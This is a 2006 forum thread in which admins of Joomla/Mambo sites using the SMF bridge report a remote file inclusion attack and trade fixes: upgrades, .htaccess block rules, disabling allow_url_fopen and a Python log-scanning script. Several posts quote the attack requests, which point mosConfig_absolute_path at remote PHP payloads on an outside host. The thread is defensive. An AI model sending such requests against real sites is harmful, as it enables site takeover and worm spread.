Hey, I got hacked by the bridge. When I try to get to the forum I can't, and there is a message that I got hacked. Please help me.
The bridge is Bridge Mambo, Joomla SMF 1.1.2
The Mambo is mambov4.5.3h
The SMF is SMF 1.1 RC2
What do I have to do?
Post a URL please.
Read this thread to find the fixes :
http://www.simplemachines.org/community/index.php?topic=100035.0;all
http://www.simplemachines.org/community/index.php?topic=100140.0
Hi!
There is an SMF bridge exploit running through the web.
In my access log there are many entries like
/component/option,com_smf/Itemid,28/components/com_smf/smf.php?mosConfig_absolute_path=http://URLEDITFORSECURITYREASONS/list.txt
or e.g.
/component/option,com_smf/components/com_smf/smf.php?mosConfig_absolute_path=http://URLEDITFORSECURITYREASONS/e4.php
Is there a security hole in the bridge and, if so, which versions are affected?
Kind regards,
Markus :(
This has been discussed. Don't you read the sticky posts?
All versions prior to 1.1.5a will require a single line addition to the smf.php file.
Quote from: Kindred - July 18, 2006, 02:44:07 PM
This has been discussed. Don't you read the sticky posts?
All versions prior to 1.1.5a will require a single line addition to the smf.php file.
Sorry, I did not know that the topic "security update" has to do with this "problem".
It could have been that there is also another security hole...
In the Joomla forum I found a helpful solution for most/common Joomla exploits.
Code from here: http://forum.joomla.org/index.php/topic,75376.0.html
Insert into the .htaccess file of the Joomla root directory:
########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|\%20|\%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
That's not a fix or a guarantee that a site is not affected by security holes of other 3pd Joomla components,
but it makes 3pd Joomla components a little bit more secure.
Markus
Hello all!
Today I noticed unusually high traffic on my site, so I checked my Apache log file and found numerous records of this type:
81.169.128.x - - [18/Jul/2006:16:41:39 -0500] "GET /component/option,com_smf/Itemid,36/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e3.php?? HTTP/1.0" 200 35729 "-" "Mozilla/5.0"
81.169.128.x - - [18/Jul/2006:16:42:05 -0500] "GET /component/option,com_smf/Itemid,36/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e4.php?? HTTP/1.0" 200 35659 "-" "Mozilla/5.0"
81.169.128.x - - [18/Jul/2006:16:42:06 -0500] "GET /component/option,com_smf/Itemid,36/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e4.php?? HTTP/1.0" 200 35717 "-" "Mozilla/5.0"
These attacks came from various IPs, with the string mosConfig_absolute_path=http://www.podgorz.cc/e*.php?? in the URL. All of the e*.php files are trying to get a file, http://www.podgorz.cc/elo.txt, and then compile it, although I have no idea what the code is for. I did a quick Google search and realized that this is a worm called Perl.Raumoni, but I am still not sure exactly what the hazard is.
Any of you had this experience? What do I do to correct or prevent any damage?
Thanks,
duckpond
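A way to triage an Apache access log for the requests described in the post above (added example, not part of the original thread): the script flags any request that sets a `mosConfig_*` parameter to a remote URL and records whether the server answered with a 2xx status. The sample lines, the host `remote.example` and the 192.0.2.x addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format (not from the thread).
SAMPLE = [
    '192.0.2.10 - - [18/Jul/2006:16:41:39 -0500] "GET /component/option,com_smf/Itemid,36/components/com_smf/smf.php?mosConfig_absolute_path=http://remote.example/e3.php?? HTTP/1.0" 200 35729 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [18/Jul/2006:16:42:05 -0500] "GET /index.php?option=com_smf&Itemid=36 HTTP/1.1" 200 18211 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [18/Jul/2006:16:43:10 -0500] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http%3A%2F%2Fremote.example%2Fe4.php HTTP/1.0" 403 210 "-" "Mozilla/5.0"',
]

# host, timestamp, request target and status of one access-log line
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# a parameter value that points at a remote resource
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(lines):
    """Return one dict per request that sets a mosConfig_* parameter to a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes names and values, so encoded values match too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.startswith("mosConfig_") and REMOTE_RE.match(value):
                hits.append({
                    "host": m["host"],
                    "time": m["time"],
                    "param": name,
                    "remote": value,
                    # 2xx: the request was served, so check the site for changes
                    "served": m["status"].startswith("2"),
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE):
        state = "SERVED" if hit["served"] else "blocked"
        print(f'{hit["time"]} {hit["host"]} {hit["param"]} -> {hit["remote"]} [{state}]')
```

A hit with `served` set only shows that the request was answered with a 2xx status; whether the include succeeded depends on the bridge version and PHP settings discussed in this thread.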
Argh, they beat me to my site, but I did make a backup in time.
Watch this: http://www.simplemachines.org/community/index.php?topic=100140.0
and this: http://www.simplemachines.org/community/index.php?topic=99747.0
and this: http://www.simplemachines.org/community/index.php?topic=100260.msg649272#msg649272
Something you can add to your .htaccess if you're running PHP as an Apache module is this:
php_flag allow_url_fopen Off
This will not work if you are running PHP as CGI!
What this does is prevent includes and requires from being URLs. There will be a PHP error if that is attempted.
If you are running PHP as CGI, you can contact your host and ask them to turn off allow_url_fopen.
Hi All,
My forum has been hacked today, and it looks like the following requests were sent for the hack attempt:
/component/option,com_smf/Itemid,177/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e3.php??
/component/option,com_smf/Itemid,177/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e4.php??
/component/option,com_smf/Itemid,177/components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e5.php??
It looks like I had register_globals on for some reason (I always thought this was off, which was stupid of me)...
Just wanted to inform others so that they would not make the same mistake...
Stickied to the top of this board:
http://www.simplemachines.org/community/index.php?topic=100140.0
Back up, sans bridge. Now that I have access to SMF again, I can get started with the upgrade and then the install of bridge *.15. My test site and the site I run for my friend were already running that version because they were running RC2. My site was running 1.0.7 for both Joomla and SMF, but now I know not to wait on 1.1 b/c Orstio isn't the only one who abandoned 1.0.x
Quote:
my test site and the site I run for my friend were already running that version because they were running RC2
Make sure to upgrade to 1.1.5a.
Is there a mailing list? This would make sense to announce security updates of the bridge and new versions to the subscribers. I often check the forum, but there are many people who install it and never visit the forums again (unless they have a problem, and that's maybe too late). Or a text in the admin panel of Joomla which checks for the latest version and goes red if you have an old version....
When was 1.1.5a released? My panels just say 1.1.5 for the current installed version.
Edit:
Found the edit in the post for 1.1.5, applied changed sef.php
Quote:
Is there a mailing list? This would make sense to announce security updates of the bridge and new versions to the subscribers. I often check the forum, but there are many people who install it and never visit the forums again (unless they have a problem, and that's maybe too late). Or a text in the admin panel of Joomla which checks for the latest version and goes red if you have an old version....
No, there isn't unfortunately. There is talk of it, but nothing yet.
I can host it if necessary, just putting that out there. (Probably better if a bigger site with more bandwidth picks it up though)
Or we could set up a newsgroup or something. Let's figure something out in the short term, then we can transition to something bigger.